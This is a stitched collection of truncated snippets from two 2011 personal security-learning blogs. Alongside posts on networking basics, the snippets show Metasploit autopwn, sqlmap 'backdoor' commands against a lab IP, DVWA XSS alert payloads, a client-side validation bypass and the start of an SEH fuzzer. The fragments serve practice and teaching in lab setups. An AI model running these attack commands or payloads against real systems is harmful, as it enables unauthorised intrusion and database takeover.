gepenkcuakep.blogspot.com
Uncl3 Blog's: SOCKS
http://gepenkcuakep.blogspot.com/2011/07/socks.html
Newbie newbie newbie newbie. SOCKS is a network protocol designed to allow clients to communicate with Internet servers through firewalls. SOCKS is typically implemented on proxy servers. It is supported as a proxy configuration option in popular Web browsers and instant messaging programs. SOCKS can also be found in some VPN implementations. Http:/ compnetworking.about.com/od/networkprotocols/g/bldef socks.htm. Subscribe to: Post Comments (Atom). Urip dinggo akhirat lan donya. View my complete profile.
gepenkcuakep.blogspot.com
Uncl3 Blog's: Play Metasploit db_autopwn on Windows XP SP2 "Abal-Abal"
http://gepenkcuakep.blogspot.com/2011/09/play-metasploit-dbautopwn-on-windows-xp.html
Newbie newbie newbie newbie. Play Metasploit db autopwn on Windows XP SP2 "Abal-Abal". Postgresql connected to msf3. Address mac name os name os flavor os sp purpose info comments. Msf db nmap 192.168.56.101. Nmap: Starting Nmap 5.51SVN ( http:/ nmap.org ) at 2011-09-30 07:49 WIT. Nmap: Nmap scan report for 192.168.56.101. Nmap: Host is up (0.0011s latency). Nmap: Not shown: 996 closed ports. Nmap: PORT STATE SERVICE. Nmap: 135/tcp open msrpc. Nmap: 139/tcp open netbios-ssn. Msf db autopwn -p -t -e.
gepenkcuakep.blogspot.com
Uncl3 Blog's: May 2011
http://gepenkcuakep.blogspot.com/2011_05_01_archive.html
Newbie newbie newbie newbie. Run Google Chrome on Backtrack. To simply install google chrome on Backtrack 5,. However, developers of google chrome have not allowed root privileges. If you try to run it on backtrack, you will get an error. Chromium can not be run as root. Please start Chromium as a normal user. If you have previously run Chromium as root, you will need to change the ownership of your profile directory. You are presented with the above screen. Quite complicated, is'n it? Links to this post.
gepenkcuakep.blogspot.com
Uncl3 Blog's: Server Exploit
http://gepenkcuakep.blogspot.com/2011/07/server-exploit.html
Newbie newbie newbie newbie. To exploit a server I use scanner to know the aplication running on the system, after I scan i got the result but the aplication is the latest version show I can break the system over the aplication. After that i just run the exploit on the kernel to gained the full access as root and it is work. Now I have full access to the system. Subscribe to: Post Comments (Atom). Urip dinggo akhirat lan donya. View my complete profile. Create Backdoor From MySQL. 169; Uncl3 Blog's.
gepenkcuakep.blogspot.com
Uncl3 Blog's: Subnetting
http://gepenkcuakep.blogspot.com/2011/06/subnetting.html
Newbie newbie newbie newbie. Subnetting is 32 bit binary numbers it can use to differentiate betwen network ID and host ID. It can be represent the location host, on local network or external network. We often see in writing the ip address/computer addressing as follows 192.168.0.1/24. Subscribe to: Post Comments (Atom). Urip dinggo akhirat lan donya. View my complete profile. Bypass Client Side JS. Damn Vulnerable Web App (DVWA). XSS Persistent and XSS Non - Persistent. DENIAL OF SERVICE TESTING.
gepenkcuakep.blogspot.com
Uncl3 Blog's: Bypass Client Side JS
http://gepenkcuakep.blogspot.com/2011/06/bypass-client-side-js.html
Newbie newbie newbie newbie. Bypass Client Side JS. This website performs both client and server side validation. For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting. You must break all 7 validators at the same time. I try to input. But it seems not succes it just make appear pop up. So I try with burpsuite to change the variable on the box. I just add ABC. I just add 456. I just add 7. I just add 12345. I just add 1234567. I just add 9876.
cilholic.blogspot.com
Cil's Blog: SEH BASED EXPLOITS DEVELOPMENT TUTORIAL
https://cilholic.blogspot.com/2011/12/seh-based-exploits-and-development.html
Just Ordinary People Who Want To Share. Wednesday, December 7, 2011. SEH BASED EXPLOITS DEVELOPMENT TUTORIAL. Meet again with me "CIL", this tutorial will discuss about the exploit development. And of course with. The target victim system (windows xp sp2 running on virtualbox) requires sofware :. Xradio v 0.95. The attacking system requires :. In here i'm using python to make fuzzer with extension .XRL :. Filename = "radio.XRL". Junk = "A" * 5000. Print " File",filename,"has been created". Copy char from...
gepenkcuakep.blogspot.com
Uncl3 Blog's: Damn Vulnerable Web App (DVWA)
http://gepenkcuakep.blogspot.com/2011/06/damn-vulnerable-web-app-dvwa.html
Newbie newbie newbie newbie. Damn Vulnerable Web App (DVWA). DVWA is to practice or learn the vulnerablity web. In this application include :. I just try to XSS level low with this script :. Script alert("XSS LOW") /script. And the result is like in this picture. And then the next level is medium. In this level I just try with this script. Script language=javascript alert("XSS Medium"); /script. And the result is like in the picture. The next level is high level. Subscribe to: Post Comments (Atom).
gepenkcuakep.blogspot.com
Uncl3 Blog's: Create Backdoor From MySQL
http://gepenkcuakep.blogspot.com/2011/07/create-backdoor-from-mysql.html
Newbie newbie newbie newbie. Create Backdoor From MySQL. I scan with sqlmap and this is the syntax. Root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http:/ 192.168.56.101/webku3/login.php? Data "username=27&password=27" - dbs - level=5 - risk=3. Sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool. Http:/ sqlmap.sourceforge.net. 22:36:51] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file. 22:36:51] [INFO] resuming injection data from session file.